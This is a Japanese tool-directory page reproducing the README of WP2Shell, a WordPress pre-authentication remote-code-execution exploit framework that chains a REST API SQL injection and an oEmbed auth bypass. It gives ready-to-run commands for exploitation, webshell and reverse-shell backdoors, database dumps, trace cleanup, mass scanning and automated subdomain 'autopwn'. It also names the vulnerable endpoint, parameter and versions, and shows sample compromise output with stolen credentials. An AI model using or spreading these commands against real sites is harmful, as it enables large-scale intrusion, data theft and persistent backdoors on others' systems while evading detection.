Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
WP2Shell — SQLインジェクションと認証バイパスを連鎖させ、リモートコード実行、インタラクティブシェル、バックドア、大規模な脆弱性スキャンを実現するモジュール式WordPress事前認証エクスプロイトフレームワーク。 | Kitploit
ツール/GitHubGitHub/g0d150ne/wp2shell
ペネトレーションテストフレームワーク偵察脆弱性スキャナーエクスプロイトフレームワーク永続化メカニズムエクスプロイトウェブアプリケーション悪用WAFバイパスリモートアクセスツールペイロード開発
GitHubg0d150ne/wp2shell

WP2Shell

9日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

SQLインジェクションと認証バイパスを連鎖させ、リモートコード実行、インタラクティブシェル、バックドア、大規模な脆弱性スキャンを実現するモジュール式WordPress事前認証エクスプロイトフレームワーク。

リポジトリを見る

WP2Shell - WordPress 事前認証 RCE エクスプロイト

CVE-2026-63030 + CVE-2026-60137
バージョン: 4.0.0
作者: G0D150NE

📌 概要

WP2Shell は、WordPress の事前認証リモートコード実行(RCE)のためのフルチェーンエクスプロイトツールです。このツールは、2 つの重大な脆弱性を組み合わせています:

  • CVE-2026-63030 - REST API バッチエンドポイントにおける SQL インジェクション
  • CVE-2026-60137 - oEmbed キャッシュポイズニングによる認証バイパス

このツールは、一切の認証なしで 脆弱な WordPress インストールの完全な侵害を可能にします。検出から完全な RCE、そして永続化までを実現します。

⚡ 機能

  • 🔍 非破壊チェック - 安全な脆弱性確認
  • 📊 マルチテクニック抽出 - UNION、エラーベース、ブラインド SQLi
  • 🚀 完全な RCE チェーン - SQLi から管理者アカウント作成まで
  • 🐚 ウェブシェル展開 - 隠しプラグインベースのバックドア
  • 🧹 クリーンアップ機能 - すべての痕跡を削除
  • 📡 マススキャン - 複数ターゲット向けスレッドスキャナー
  • 🤖 Autopwn モード - サブドメイン発見 + 自動悪用
  • 🌐 プロキシローテーション - ローテーションプロキシのサポート
  • 🕵️ ステルスモード - ランダム遅延と WAF バイパステクニック

🔧 インストール

root@kitploit:~
# Clone repository
git clone https://github.com/g0d150ne/wp2shell.git
cd wp2shell

# No dependencies needed - uses Python 3.8+ standard library
chmod +x wp2shell.py

🎯 使い方

コマンド構造

root@kitploit:~
python3 wp2shell.py [COMMAND] [OPTIONS] [TARGET]

利用可能なコマンド

🚀 使用例

1. 脆弱性チェック

root@kitploit:~
python3 wp2shell.py check https://target.com
root@kitploit:~
python3 wp2shell.py check https://target.com --confirm-timing --sleep 5

2. データ抽出

基本的なフィンガープリント:

root@kitploit:~
python3 wp2shell.py read https://target.com

ユーザーの抽出:

root@kitploit:~
python3 wp2shell.py read https://target.com --preset users

カスタムクエリ:

root@kitploit:~
python3 wp2shell.py read https://target.com --query "SELECT @@version"

データベース全体のダンプ:

root@kitploit:~
python3 wp2shell.py read https://target.com --preset dumpall --max-length 4096

3. 完全な悪用

基本的な悪用:

root@kitploit:~
python3 wp2shell.py exploit https://target.com

対話型シェルによる悪用:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --interactive

バックドアをインストールした悪用:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --backdoor --lhost 192.168.1.100 --lport 4444

データベースをダンプする悪用:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --dumpdb

クリーンアップ付きの悪用(痕跡の削除):

root@kitploit:~
python3 wp2shell.py exploit https://target.com --cleanup

4. 既存の管理者認証情報を使用する

root@kitploit:~
python3 wp2shell.py shell https://target.com --user admin --password secret123 --interactive
root@kitploit:~
python3 wp2shell.py shell https://target.com --user admin --password secret123 --command "whoami"

5. マススキャン

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Scan with 50 threads
python3 wp2shell.py masscan --file targets.txt --threads 50 --output results.csv

6. Autopwn モード(完全自動化)

root@kitploit:~
python3 wp2shell.py autopwn --domain example.com --lhost 192.168.1.100

これにより、次の処理が実行されます:

  1. crt.sh 経由でサブドメインを発見
  2. WordPress インストールを特定
  3. すべての脆弱なサイトを悪用
  4. 成功したターゲットにバックドアをインストール

🎮 対話型シェル

悪用後、完全な対話型シェルを利用できます:

root@kitploit:~
python3 wp2shell.py exploit https://target.com -i
root@kitploit:~
[*] Interactive shell — type 'exit' to quit
/var/www/html $ id
uid=33(www-data) gid=33(www-data)
/var/www/html $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
/var/www/html $ exit

🛡️ オプションリファレンス

共通オプション

read コマンドのオプション

exploit コマンドのオプション

🔬 技術詳細

脆弱性チェーン

  1. SQL インジェクション(CVE-2026-63030)

    • /wp-json/batch/v1 エンドポイントで発生
    • author_exclude パラメータが時間ベースのブラインド SQLi に対して脆弱
    • UNION およびエラーベースの抽出が可能
  2. 認証バイパス(CVE-2026-60137)

    • /_embed パラメータによる oEmbed キャッシュポイズニング
    • カスタマイザーの変更セットを通じて管理者ユーザーの作成が可能
    • 特権アカウント作成のための再エントリーチェーンをトリガー

対応 WordPress バージョン

抽出テクニック

📊 出力例

悪用成功時

root@kitploit:~
░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░▒▓███████▓▒░ ░▒▓███████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓█▓▒░      ░▒▓█▓▒░        
                                                                                                                                                                                                                            
  CVE-2026-63030 + CVE-2026-60137
  WordPress Pre-Auth RCE  [v4.0.0]
  + G0D150NE

[1/7] Reconnaissance
  Target: https://target.com
  WordPress 6.9.3
[+] UNION extraction available (in-band, 1 request/value)

[2/7] Enumerating target
[+] Discovered table prefix: wp_

[3/7] Locating embed target
[+] Embed URL: https://target.com/2020/01/01/hello-world/

[4/7] Seeding oEmbed cache posts
[+] Seed payload delivered

[5/7] Extracting cache post IDs
[+] Cache IDs: [12345, 12346, 12347, 12348]

[6/7] Triggering escalation chain
[+] Administrator created via re-entry chain

[7/7] Deploying webshell
[+] Authenticated
[+] RCE confirmed
  uid: www-data

[+] ========================================================
[+]   TARGET COMPROMISED
[+]   Admin:  wp_service_a1b2 / G7hK9xQw2p$L!mN
[+]   Shell:  https://target.com/wp-content/plugins/cache_a1b2/cache_a1b2.php
[+] ========================================================

⚠️ 免責事項

このツールは、認可されたセキュリティテストおよび教育目的のみ を対象としています。明示的な許可なくシステムに対して使用することは違法です。作者は、不正使用について一切の責任を負いません。

📚 参考情報

  • CVE-2026-63030
  • CVE-2026-60137
  • WordPress セキュリティアドバイザリ
  • WP2Shell テクニカルブログ

🤝 コントリビューション

バグを発見しましたか? ツールを改善したいですか? プルリクエスト歓迎!

  1. リポジトリをフォーク
  2. 機能ブランチを作成
  3. 変更をコミット
  4. ブランチにプッシュ
  5. プルリクエストを作成

📄 ライセンス

MIT ライセンス - 詳細は LICENSE ファイルを参照してください。

ツールをダウンロード
コマンド説明
check非破壊の脆弱性確認
readSQL インジェクションによるデータ抽出
exploit完全な事前認証 RCE チェーン
shell既存の認証情報を使用してウェブシェルを展開
masscan複数ターゲットのマススキャン
autopwn自動検出 → スキャン → 悪用
オプション説明
--timeoutHTTP タイムアウト(秒単位、デフォルト: 30)
--proxiesカンマ区切りのプロキシリスト(例: http://127.0.0.1:8080)
--stealthランダムな遅延を伴うステルスモードを有効化
-v, --verboseデバッグ出力を有効化
-q, --quietバナーと情報メッセージを抑制
オプション説明
--prefixテーブルプレフィックス(デフォルト: wp_)
--auto-prefixテーブルプレフィックスを自動検出
--max-length値あたりの最大文字数(デフォルト: 128)
--technique抽出テクニック: auto/union/error/blind
--presetデータプリセット: fingerprint/users/dumpall
--query抽出する任意の SQL 式
オプション説明
--prefixテーブルプレフィックス(デフォルト: wp_)
--no-discover自動検出をスキップしてデフォルトを使用
-i, --interactive悪用後に対話シェルに入る
-c, --command悪用後に単一のコマンドを実行
--backdoor持続性バックドアをインストール
--lhostリバースシェル用の LHOST(デフォルト: 10.0.0.1)
--lportリバースシェル用の LPORT(デフォルト: 4444)
--dumpdb悪用後にデータベースをダンプ
--cleanup終了時に作成したユーザーとウェブシェルを削除
バージョンステータス
6.9.0✅ 脆弱
6.9.1✅ 脆弱
6.9.2✅ 脆弱
6.9.3✅ 脆弱
6.9.4✅ 脆弱
7.0.0✅ 脆弱
7.0.1✅ 脆弱
≥ 7.0.2❌ 修正済み
テクニック速度データサイズ条件
UNION⚡ 非常に高速無制限ターゲットが UNION をフィルタリングしていないこと
Error🚀 高速約30文字/リクエストターゲットがエラーメッセージを公開していること
Blind🐢 低速無制限ブールオラクルが利用可能